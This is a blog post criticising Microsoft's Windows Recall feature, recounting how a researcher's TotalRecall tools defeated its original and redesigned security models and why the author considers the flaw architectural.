The Zombie That Won't Stay Dead

Microsoft rebuilt Windows Recall from scratch. A researcher broke it again in a few weeks. Microsoft's response: that's not a vulnerability.
Part of the ongoing Big Tech's War on Users series.

You remember Recall.

Microsoft announced it in May 2024 as the flagship feature of their new Copilot+ AI PCs. It would take continuous screenshots of everything you do on your computer, index them, and let you search back through your own activity like a personal time machine. Browse to a website, read an email, open a document — Recall sees it, stores it, and makes it searchable.

The security community noticed immediately what that implied. A single AI-powered dragnet sitting on your machine, screenshot by screenshot, accumulating every password field, bank statement, private message, and confidential document that crossed your screen — stored locally, but accessible. Security researcher Kevin Beaumont coined a phrase for what a malware author could do with it: infostealer paradise.

And it would be doing all of this continuously, in the background, while you were trying to use your computer for something else. The Copilot+ hardware requirement — the dedicated NPU that made the new PCs more expensive — exists in part so this process doesn't grind your system to a halt. Microsoft needed new silicon to run the surveillance efficiently. The surveillance was the feature.

Recall wasn't the only reason for the NPU mandate, to be fair. The broader pitch was Copilot everywhere — shoved into Word, Excel, Outlook, Teams, Paint, Notepad. Notepad. Microsoft found a way to make a text editor that's been shipping since 1985 feel like it needed an AI co-pilot. The NPU was the hardware foundation for that whole strategy, and Recall was the flagship demo that made it tangible at a keynote.

That strategy has since shown some cracks. Microsoft has been walking parts of it back — less Copilot in places it had no business being, some movement toward consolidated settings for it. Pavan Davuluri's "we hear you" post in March was as close to an admission as you usually get from a company this size. I wrote about what that actually means a few weeks ago. The short version: the leopard does not change its spots. It maybe hides a few of them temporarily when the user backlash is loud enough.

Recall never made it into that rollback conversation. It kept quietly moving forward.

Microsoft pulled it before it shipped — in part because researchers had already walked straight in and helped themselves. The original stored everything in an unencrypted SQLite database with no meaningful access controls. Hagenah's first tool, the original TotalRecall, could copy a full day's worth of data in about two seconds. No exploit. No elevated permissions. No particular skill required. Just point the tool at the database and watch your entire digital life come out the other end.

It wasn't a sophisticated attack. It was a screen door.

To be clear, this isn't a problem with the concept in the abstract. Enterprise security tools — Teramind, Veriato, Proofpoint — have been doing screenshot capture, OCR, and full activity recording for years. Legally, with consent, with defined retention policies, with role-based access controls, and with audit trails built for HIPAA and SOX compliance. The data doesn't sit in an unprotected file on the user's own machine. There's a managed backend, an IT team, and a governance framework. The capability exists and can be done responsibly. Microsoft's problem was trying to ship a consumer version of it with none of those guardrails, baked into the OS as an opt-out feature, and calling it a personal AI assistant.

The concept isn't the boneheaded part. The implementation and the approach are the boneheaded part.

Went back to the drawing board. Promised a redesigned security model. Rolled it out quietly to Windows Insiders late last year.

It has now been broken again.

The same researcher who broke the original — Alexander Hagenah — has published a new tool called TotalRecall Reloaded. The mechanism is straightforward and, once you hear it, hard to unsee.

Recall's data lives in what Microsoft calls a VBS Enclave. A locked box. You authenticate through Windows Hello — biometrics, PIN — and the box opens to show you your timeline. Microsoft specifically designed this to prevent malware from riding along with that authentication and stealing the contents.

Hagenah's tool rides along anyway.

It sits quietly in the background. It waits. When you open Recall and authenticate through Windows Hello, TotalRecall Reloaded is there. And when the vault opens, it takes everything.

Microsoft's response, delivered to The Verge: "after careful investigation, we determined that the access patterns demonstrated are consistent with intended protections and existing controls, and do not represent a bypass of a security boundary."

Not a vulnerability.

There's an old programming adage: if it's documented, it's not a bug, it's a feature. Microsoft published a detailed breakdown of Recall's security model in September 2024. When Hagenah demonstrated that the security model itself was the attack surface, Microsoft had the receipts ready. Working as designed. It's in the blog post.

Here's the part worth sitting with.

Hagenah isn't claiming the vault is weak. He specifically praised the VBS Enclave as "rock solid." The cryptography is fine. The authentication is real. The locked box is, as he put it, a titanium vault door.

The problem is the wall next to it.

"The fundamental problem isn't the crypto, the enclave, the authentication, or the PPL. It's sending decrypted content to an unprotected process for rendering."

Meaning: the vault opens, the decrypted data has to go somewhere for you to actually see it, and that somewhere is not protected. The moment Recall has to show you your own timeline, it has to hand the contents to a process that other things can reach. You can't fix that with better locks. The locks are already titanium. The problem is architectural — it's baked into what Recall is required to do in order to function at all.

Microsoft saying "that's not a vulnerability" is technically defensible and practically meaningless. If the design of the feature creates the attack surface, the design is the vulnerability. Calling it "intended behavior" doesn't make it less exploitable.

This is the zombie risk.

Not that Recall is bad security. Not that Microsoft is being careless. The zombie risk is that some problems don't have patches. You can kill the feature, redesign it, rebuild it, tighten every bolt — and the problem comes back because the problem is structural. Because a feature that records everything you do and makes it searchable will always have to, at some point, show you what it recorded. And the moment it does, that data is exposed.

Every redesign just relocates the drywall.

Recall has been recalled, redesigned, re-launched, and re-broken. The timeline:

  • May 2024: Announced
  • June 2024: Pulled before launch after public outcry
  • September 2024: Redesigned security model published
  • Early 2025: Rolled out to Windows Insiders
  • March 2026: Hagenah responsibly discloses to Microsoft
  • April 2026: Microsoft says it's not a vulnerability
  • April 2026: The rest of us find out anyway
That last step is also worth noting. Hagenah reported this responsibly. He waited. Microsoft reviewed it, decided there was nothing to fix, and closed the ticket. He then published — because what else do you do? — and now it's in the news cycle. The responsible disclosure process worked exactly as designed and produced no change in the product.

The part nobody asked for is also the part worth asking about.

Recall exists because Microsoft needed a reason to sell Copilot+ PCs. They needed a flagship AI feature that made the hardware requirement feel justified. Recall was it — a "wow" demo that made sense in a keynote and fell apart the moment anyone thought about it for thirty seconds. And the keynote pitch was explicit: Copilot could answer questions about your own past activity because it had been watching the whole time. Recall wasn't a standalone feature. It was Copilot's long-term memory layer.

That detail reframes everything about the security architecture. If Recall's data was ever genuinely locked down — sealed, sandboxed, inaccessible to outside processes — Copilot couldn't query it either. You can't build a vault that one specific Microsoft process also has a key to without that key becoming an attack surface. The "secure" version of Recall and the "Copilot can use it" version of Recall were always in direct tension, and Microsoft needed both. So they built the vault and left Copilot's access path in the wall next to it.

Which means "not a vulnerability" isn't just defensiveness. It's almost technically accurate — just not in the way Microsoft wants it to sound. There's no specific flaw to patch here. The design itself is the flaw. A genuine fix would mean rearchitecting the entire data pipeline, which would mean Copilot losing its key, which would mean the feature stops being what they sold at the keynote. That's not a bug report. That's a product decision that got made wrong at the beginning and has been defended ever since.

The enterprise tools that have been doing this for years don't have this problem — and the reason is simple. Teramind, Veriato, Proofpoint: none of them were ever designed to share their data with a general-purpose AI assistant by default. Their entire security model starts from the opposite assumption — this data should be as inaccessible as possible, except to authorized personnel, through a hardened interface, with scoped permissions and a full audit trail of who accessed what and when. Nobody is pitching Teramind as "and then your AI can answer questions about your audit logs." That's not the use case. The use case is the opposite.

Recall was architected to be queryable first and secured second. The enterprise tools were secured first and made queryable only under strict controls. That's not a subtle distinction. That's the whole ballgame.

Nobody asked for a screenshot diary of their entire computing life. Nobody filed a feature request for "store everything I've ever done in a searchable local database and make it available to an AI assistant." The users who want something like this can build it, on their own terms, with tools that were designed with the security model in mind from day one.

Recall keeps coming back for the same reason it keeps getting broken: the business model requires Copilot to have a key, and nobody with the power to change that actually wants to give it up.

Find me on Mastodon at @ppb1701@ppb.social. The thread, as always, keeps not running out.

Part of the ongoing Big Tech's War on Users series.